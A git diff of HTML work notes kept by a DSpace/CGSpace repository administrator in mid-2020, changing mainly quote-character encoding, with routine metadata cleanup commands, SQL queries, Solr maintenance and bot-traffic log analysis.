&#34;Global Food Security Programme, United Kingdom&#34;,&#34;Global Food Security Programme, United Kingdom&#34;
$ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t correct -m 29
</code></pre><ul>
<li>Upload the Capacity Development July newsletter to CGSpace for Ben Hack because Abenet and Bizu usually do it, but they are currently offline due to the Internet being turned off in Ethiopia
<ul>
@ -432,9 +432,9 @@ $ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -
<ul>
<li>Generate a CSV of all the AGROVOC subjects that didn&rsquo;t match from the top 6500 I exported earlier this week:</li>
</ul>
<pre tabindex="0"><code>$ csvgrep -c 'number of matches' -r &quot;^0$&quot; 2020-07-05-cgspace-subjects.csv | csvcut -c 1 &gt; 2020-07-05-cgspace-invalid-subjects.csv
<pre tabindex="0"><code>$ csvgrep -c &#39;number of matches&#39; -r &#34;^0$&#34; 2020-07-05-cgspace-subjects.csv | csvcut -c 1 &gt; 2020-07-05-cgspace-invalid-subjects.csv
</code></pre><ul>
<li>Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors' names because of &ldquo;funny character&rdquo; issues with reports generated from CGSpace
<li>Yesterday Gabriela from CIP emailed to say that she was removing the accents from her authors&rsquo; names because of &ldquo;funny character&rdquo; issues with reports generated from CGSpace
<ul>
<li>I told her that it&rsquo;s probably her Windows / Excel that is messing up the data, and she figured out how to open them correctly!</li>
<li>Now she says she doesn&rsquo;t want to remove the accents after all and she sent me a new list of corrections</li>
@ -442,13 +442,13 @@ $ ./fix-metadata-values.py -i 2020-07-07-fix-sponsors.csv -db dspace -u dspace -
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ csvgrep -c 2 -r &quot;^.+$&quot; ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r &quot;^.*[À-ú].*$&quot; | csvgrep -c 2 -r &quot;^.*[À-ú].*$&quot; -i | csvcut -c 1,2
<pre tabindex="0"><code>$ csvgrep -c 2 -r &#34;^.+$&#34; ~/Downloads/cip-authors-GH-20200706.csv | csvgrep -c 1 -r &#34;^.*[À-ú].*$&#34; | csvgrep -c 2 -r &#34;^.*[À-ú].*$&#34; -i | csvcut -c 1,2
dc.contributor.author,correction
&quot;López, G.&quot;,&quot;Lopez, G.&quot;
&quot;Gómez, R.&quot;,&quot;Gomez, R.&quot;
&quot;García, M.&quot;,&quot;Garcia, M.&quot;
&quot;Mejía, A.&quot;,&quot;Mejia, A.&quot;
&quot;Quiróz, Roberto A.&quot;,&quot;Quiroz, R.&quot;
&#34;López, G.&#34;,&#34;Lopez, G.&#34;
&#34;Gómez, R.&#34;,&#34;Gomez, R.&#34;
&#34;García, M.&#34;,&#34;Garcia, M.&#34;
&#34;Mejía, A.&#34;,&#34;Mejia, A.&#34;
&#34;Quiróz, Roberto A.&#34;,&#34;Quiroz, R.&#34;
</code></pre><ul>
<li>
<p>csvgrep from the csvkit suite is <em>so cool</em>:</p>
@ -475,7 +475,7 @@ dc.contributor.author,correction
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-07-08-affiliations.csv WITH CSV HEADER;
</code></pre><ul>
<li>Then I stripped the CSV header and quotes to make it a plain text file and ran <code>ror-lookup.py</code>:</li>
</ul>
@ -510,12 +510,12 @@ $ csvgrep -c matched -m false 2020-07-08-affiliations-ror.csv | wc -l
<li>So now our matching improves to 1515 out of 5866 (25.8%)</li>
<li>Gabriela from CIP said that I should run the author corrections minus those that remove accent characters so I will run it on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correction -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-09-fix-90-cip-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correction -m 3
</code></pre><ul>
<li>Apply 110 fixes and 90 deletions to sponsorships that Peter sent me a few days ago:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -t 'correct/action' -m 29
$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-07-fix-110-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t &#39;correct/action&#39; -m 29
$ ./delete-metadata-values.py -i /tmp/2020-07-07-delete-90-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29
</code></pre><ul>
<li>Start a full Discovery re-index on CGSpace:</li>
</ul>
@ -552,7 +552,7 @@ $ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l
</ul>
</li>
</ul>
<pre tabindex="0"><code># grep 199.47.87 dspace.log.2020-07-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code># grep 199.47.87 dspace.log.2020-07-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2815
</code></pre><ul>
<li>So I need to add this alternative user-agent to the Tomcat Crawler Session Manager valve to force it to re-use a common bot session</li>
@ -567,7 +567,7 @@ $ csvgrep -c matched -m true 2020-07-09-cgspace-sponsors-crossref.csv | wc -l
</code></pre><ul>
<li>Generate a list of sponsors to update our controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.description.sponsorship&quot;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &quot;dc.description.sponsorship&quot; ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.description.sponsorship&#34;, count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29 GROUP BY &#34;dc.description.sponsorship&#34; ORDER BY count DESC LIMIT 125) TO /tmp/2020-07-12-sponsors.csv;
COPY 125
dspace=# \q
$ csvcut -c 1 --tabs /tmp/2020-07-12-sponsors.csv &gt; dspace/config/controlled-vocabularies/dc-description-sponsorship.xml
@ -590,12 +590,12 @@ $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/dc-descripti
<ul>
<li>I ran the <code>dspace cleanup -v</code> process on CGSpace and got an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(189618) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(189618) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);'
<pre tabindex="0"><code>$ psql -d dspace -U dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (189618, 188837);&#39;
UPDATE 1
</code></pre><ul>
<li>Udana from WLE asked me about some items that didn&rsquo;t show Altmetric donuts
@ -625,13 +625,13 @@ COPY 194
$ csvgrep -c matched -m false /tmp/2020-07-15-countries-resolved.csv
country,match type,matched
CAPE VERDE,,false
&quot;KOREA, REPUBLIC&quot;,,false
&#34;KOREA, REPUBLIC&#34;,,false
PALESTINE,,false
&quot;CONGO, DR&quot;,,false
COTE D'IVOIRE,,false
&#34;CONGO, DR&#34;,,false
COTE D&#39;IVOIRE,,false
RUSSIA,,false
SYRIA,,false
&quot;KOREA, DPR&quot;,,false
&#34;KOREA, DPR&#34;,,false
SWAZILAND,,false
MICRONESIA,,false
TIBET,,false
@ -642,16 +642,16 @@ IRAN,,false
</code></pre><ul>
<li>Check the database for DOIs that are not in the preferred &ldquo;<a href="https://doi.org/%22">https://doi.org/&quot;</a> format:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT text_value as &quot;cg.identifier.doi&quot; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE 'https://doi.org/%') TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT text_value as &#34;cg.identifier.doi&#34; FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=220 AND text_value NOT LIKE &#39;https://doi.org/%&#39;) TO /tmp/2020-07-15-doi.csv WITH CSV HEADER;
COPY 186
</code></pre><ul>
<li>Then I imported them into OpenRefine and replaced them in a new &ldquo;correct&rdquo; column using this GREL transform:</li>
</ul>
<pre tabindex="0"><code>value.replace(&quot;dx.doi.org&quot;, &quot;doi.org&quot;).replace(&quot;http://&quot;, &quot;https://&quot;).replace(&quot;https://dx,doi,org&quot;, &quot;https://doi.org&quot;).replace(&quot;https://doi.dx.org&quot;, &quot;https://doi.org&quot;).replace(&quot;https://dx.doi:&quot;, &quot;https://doi.org&quot;).replace(&quot;DOI: &quot;, &quot;https://doi.org/&quot;).replace(&quot;doi: &quot;, &quot;https://doi.org/&quot;).replace(&quot;http://dx.doi.org&quot;, &quot;https://doi.org&quot;).replace(&quot;https://dx. doi.org. &quot;, &quot;https://doi.org&quot;).replace(&quot;https://dx.doi&quot;, &quot;https://doi.org&quot;).replace(&quot;https://dx.doi:&quot;, &quot;https://doi.org/&quot;).replace(&quot;hdl.handle.net&quot;, &quot;doi.org&quot;)
<pre tabindex="0"><code>value.replace(&#34;dx.doi.org&#34;, &#34;doi.org&#34;).replace(&#34;http://&#34;, &#34;https://&#34;).replace(&#34;https://dx,doi,org&#34;, &#34;https://doi.org&#34;).replace(&#34;https://doi.dx.org&#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx.doi:&#34;, &#34;https://doi.org&#34;).replace(&#34;DOI: &#34;, &#34;https://doi.org/&#34;).replace(&#34;doi: &#34;, &#34;https://doi.org/&#34;).replace(&#34;http://dx.doi.org&#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx. doi.org. &#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx.doi&#34;, &#34;https://doi.org&#34;).replace(&#34;https://dx.doi:&#34;, &#34;https://doi.org/&#34;).replace(&#34;hdl.handle.net&#34;, &#34;doi.org&#34;)
</code></pre><ul>
<li>Then I fixed the DOIs on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.doi -t 'correct' -m 220
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-15-fix-164-DOIs.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.identifier.doi -t &#39;correct&#39; -m 220
</code></pre><ul>
<li>I filed <a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/10">an issue on Debian&rsquo;s iso-codes</a> project to ask why &ldquo;Swaziland&rdquo; does not appear in the ISO 3166-3 list of historical country names despite it being changed to &ldquo;Eswatini&rdquo; in 2018.</li>
<li>Atmire responded about the Solr issue
@ -666,7 +666,7 @@ COPY 186
<ul>
<li>Looking at the nginx logs on CGSpace (linode18) last night I see that the Macaroni Bros have started using a unique identifier for at least one of their harvesters:</li>
</ul>
<pre tabindex="0"><code>217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] &quot;GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0&quot; 302 138 &quot;-&quot; &quot;ILRI Livestock Website Publications importer BOT&quot;
<pre tabindex="0"><code>217.64.192.138 - - [20/Jul/2020:01:01:39 +0200] &#34;GET /rest/rest/bitstreams/114779/retrieve HTTP/1.0&#34; 302 138 &#34;-&#34; &#34;ILRI Livestock Website Publications importer BOT&#34;
</code></pre><ul>
<li>I still see 12,000 records in Solr from this user agent, though.
<ul>
@ -683,7 +683,7 @@ COPY 186
<li>I re-ran the <code>check-spider-hits.sh</code> script with the new lists and purged another 14,000 more stats hits for several years each (2020, 2019, 2018, 2017, 2016), around 70,000 total</li>
<li>I looked at the <a href="https://clarisa.cgiar.org/">CLARISA</a> institutions list again, since I hadn&rsquo;t looked at it in over six months:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/Downloads/response_1595270924560.json | jq '.[] | {name: .name}' | grep name | awk -F: '{print $2}' | sed -e 's/&quot;//g' -e 's/^ //' -e '1iname' | csvcut -l | sed '1s/line_number/id/' &gt; /tmp/clarisa-institutions.csv
<pre tabindex="0"><code>$ cat ~/Downloads/response_1595270924560.json | jq &#39;.[] | {name: .name}&#39; | grep name | awk -F: &#39;{print $2}&#39; | sed -e &#39;s/&#34;//g&#39; -e &#39;s/^ //&#39; -e &#39;1iname&#39; | csvcut -l | sed &#39;1s/line_number/id/&#39; &gt; /tmp/clarisa-institutions.csv
</code></pre><ul>
<li>The API still needs a key unless you query from Swagger web interface
<ul>
@ -732,7 +732,7 @@ Removing unnecessary Unicode (U+200B): Agencia de Servicios a la Comercializaci
</li>
<li>I started processing the 2019 stats in a batch of 1 million on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
...
*** Statistics Records with Legacy Id ***
@ -749,7 +749,7 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2019
</code></pre><ul>
<li>The statistics-2019 finished processing after about 9 hours so I started the 2018 ones:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
*** Statistics Records with Legacy Id ***
@ -793,12 +793,12 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics-2018
</ul>
</li>
</ul>
<pre tabindex="0"><code>Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
</code></pre><ul>
<li>There were four records so I deleted them:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics-2018/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:10&lt;/query&gt;&lt;/delete&gt;'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics-2018/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:10&lt;/query&gt;&lt;/delete&gt;&#39;
</code></pre><ul>
<li>Meeting with Moayad and Peter and Abenet to discuss the latest AReS changes</li>
</ul>
@ -932,7 +932,7 @@ mailto\:team@impactstory\.org
</li>
<li>Export some of the CGSpace Solr stats minus the Atmire CUA schema additions for Salem to play with:</li>
</ul>
<pre tabindex="0"><code>$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
<pre tabindex="0"><code>$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f &#39;time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]&#39; -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
</code></pre><ul>
<li>
<p>Run system updates on DSpace Test (linode26) and reboot it</p>
@ -1040,7 +1040,7 @@ mailto\:team@impactstory\.org
</code></pre><ul>
<li>This one failed after a few hours:</li>
</ul>
<pre tabindex="0"><code>Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn't be processed
<pre tabindex="0"><code>Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn&#39;t be processed
com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
@ -1063,7 +1063,7 @@ If run the update again with the resume option (-r) they will be reattempted
<li>I started the same script for the statistics-2019 core (12 million records&hellip;)</li>
<li>Update an ILRI author&rsquo;s name on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p &#39;fuuu&#39; -f dc.contributor.author -t &#39;correct&#39; -m 3
Fixed 13 occurences of: Muloi, D.
Fixed 4 occurences of: Muloi, D.M.
</code></pre><h2 id="2020-07-28">2020-07-28</h2>
@ -1112,11 +1112,11 @@ Fixed 4 occurences of: Muloi, D.M.
</ul>
<pre tabindex="0"><code># grep -c numeric /usr/share/iso-codes/json/iso_3166-1.json
249
# grep -c -E '&quot;name&quot;:' /usr/share/iso-codes/json/iso_3166-1.json
# grep -c -E &#39;&#34;name&#34;:&#39; /usr/share/iso-codes/json/iso_3166-1.json
249
# grep -c -E '&quot;official_name&quot;:' /usr/share/iso-codes/json/iso_3166-1.json
# grep -c -E &#39;&#34;official_name&#34;:&#39; /usr/share/iso-codes/json/iso_3166-1.json
173
# grep -c -E '&quot;common_name&quot;:' /usr/share/iso-codes/json/iso_3166-1.json
# grep -c -E &#39;&#34;common_name&#34;:&#39; /usr/share/iso-codes/json/iso_3166-1.json
6
</code></pre><ul>
<li>Wow, the <code>CC-BY-NC-ND-3.0-IGO</code> license that I had <a href="https://github.com/spdx/license-list-XML/issues/767">requested in 2019-02</a> was finally merged into SPDX&hellip;</li>

View File

@ -36,7 +36,7 @@ It is class based so I can easily add support for other vocabularies, and the te
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -150,8 +150,8 @@ It is class based so I can easily add support for other vocabularies, and the te
</li>
<li>I purged all unmigrated stats in a few cores and then restarted processing:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/update?softCommit=true&quot; -H &quot;Content-Type: text/xml&quot; --data-binary '&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;'
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;id:/.*unmigrated.*/&lt;/query&gt;&lt;/delete&gt;&#39;
$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
</code></pre><ul>
<li>Andrea from Macaroni Bros emailed me a few days ago to say he&rsquo;s having issues with the CGSpace REST API
@ -192,16 +192,16 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'http://localhost:8080/rest/collections/1445' | json_pp | grep numberItems
&quot;numberItems&quot; : 63,
$ http 'http://localhost:8080/rest/collections/1445/items' jq '. | length'
<pre tabindex="0"><code>$ http &#39;http://localhost:8080/rest/collections/1445&#39; | json_pp | grep numberItems
&#34;numberItems&#34; : 63,
$ http &#39;http://localhost:8080/rest/collections/1445/items&#39; jq &#39;. | length&#39;
61
</code></pre><ul>
<li>Also on DSpace Test (which is running DSpace 6!), though the issue is slightly different there:</li>
</ul>
<pre tabindex="0"><code>$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708' | json_pp | grep numberItems
&quot;numberItems&quot; : 61,
$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items' | jq '. | length'
<pre tabindex="0"><code>$ http &#39;https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708&#39; | json_pp | grep numberItems
&#34;numberItems&#34; : 61,
$ http &#39;https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items&#39; | jq &#39;. | length&#39;
59
</code></pre><ul>
<li>Ah! I exported that collection&rsquo;s metadata and checked it in OpenRefine, where I noticed that two items are mapped twice
@ -210,7 +210,7 @@ $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-49
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT * FROM collection2item WHERE item_id = '107687';
<pre tabindex="0"><code>dspace=# SELECT * FROM collection2item WHERE item_id = &#39;107687&#39;;
id | collection_id | item_id
--------+---------------+---------
133698 | 966 | 107687
@ -220,8 +220,8 @@ $ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-49
</code></pre><ul>
<li>So for each id you can delete one duplicate mapping:</li>
</ul>
<pre tabindex="0"><code>dspace=# DELETE FROM collection2item WHERE id='134686';
dspace=# DELETE FROM collection2item WHERE id='128819';
<pre tabindex="0"><code>dspace=# DELETE FROM collection2item WHERE id=&#39;134686&#39;;
dspace=# DELETE FROM collection2item WHERE id=&#39;128819&#39;;
</code></pre><ul>
<li>Update countries on CGSpace to be closer to ISO 3166-1 with some minor differences based on Peter&rsquo;s preferred display names</li>
</ul>
@ -229,11 +229,11 @@ dspace=# DELETE FROM collection2item WHERE id='128819';
cg.coverage.country,correct
CAPE VERDE,CABO VERDE
COCOS ISLANDS,COCOS (KEELING) ISLANDS
&quot;CONGO, DR&quot;,&quot;CONGO, DEMOCRATIC REPUBLIC OF&quot;
COTE D'IVOIRE,CÔTE D'IVOIRE
&quot;KOREA, REPUBLIC&quot;,&quot;KOREA, REPUBLIC OF&quot;
PALESTINE,&quot;PALESTINE, STATE OF&quot;
$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
&#34;CONGO, DR&#34;,&#34;CONGO, DEMOCRATIC REPUBLIC OF&#34;
COTE D&#39;IVOIRE,CÔTE D&#39;IVOIRE
&#34;KOREA, REPUBLIC&#34;,&#34;KOREA, REPUBLIC OF&#34;
PALESTINE,&#34;PALESTINE, STATE OF&#34;
$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -t &#39;correct&#39; -m 228
</code></pre><ul>
<li>I had to restart Tomcat 7 three times before all the Solr statistics cores came up properly
<ul>
@ -267,7 +267,7 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
</li>
<li>I checked the nginx logs around 5PM yesterday to see who was accessing the server:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '04/Aug/2020:(17|18)' | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#39;04/Aug/2020:(17|18)&#39; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>I see the Macaroni Bros are using their new user agent for harvesting: <code>RTB website BOT</code>
<ul>
@ -276,7 +276,7 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep -E &quot;(63.32.242.35|64.62.202.71)&quot; | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep -E &#34;(63.32.242.35|64.62.202.71)&#34; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
5693
</code></pre><ul>
<li>DSpace itself uses a case-sensitive regex for user agents so there are no hits from those IPs in Solr, but I need to tweak the other regexes so they don&rsquo;t misuse the resources
@ -291,9 +291,9 @@ $ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspa
</li>
<li>A few more IPs causing lots of Tomcat sessions yesterday:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &quot;38.128.66.10&quot; | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &#34;38.128.66.10&#34; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
1585
$ cat dspace.log.2020-08-04 | grep &quot;64.62.202.71&quot; | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
$ cat dspace.log.2020-08-04 | grep &#34;64.62.202.71&#34; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
5691
</code></pre><ul>
<li>38.128.66.10 isn&rsquo;t creating any Solr statistics due to our DSpace agents pattern, but they are creating lots of sessions so perhaps I need to force them to use one session in Tomcat:</li>
@ -318,8 +318,8 @@ Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
</code></pre><ul>
<li>And another IP belonging to Turnitin (the alternate user agent of Turnitinbot):</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &quot;199.47.87.145&quot; | grep -E 'sessi
on_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2020-08-04 | grep &#34;199.47.87.145&#34; | grep -E &#39;sessi
on_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
2777
</code></pre><ul>
<li>I will add <code>Turnitin</code> to the Tomcat Crawler Session Manager Valve regex as well&hellip;</li>
@ -377,8 +377,8 @@ on_id=[A-Z0-9]{32}' | sort | uniq | wc -l
<ul>
<li>The Atmire stats processing for the statistics-2018 Solr core keeps stopping with this error:</li>
</ul>
<pre tabindex="0"><code>Exception: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
<pre tabindex="0"><code>Exception: 50 consecutive records couldn&#39;t be saved. There&#39;s most likely an issue with the connection to the solr server. Shutting down.
java.lang.RuntimeException: 50 consecutive records couldn&#39;t be saved. There&#39;s most likely an issue with the connection to the solr server. Shutting down.
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.storeOnServer(SourceFile:317)
at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:177)
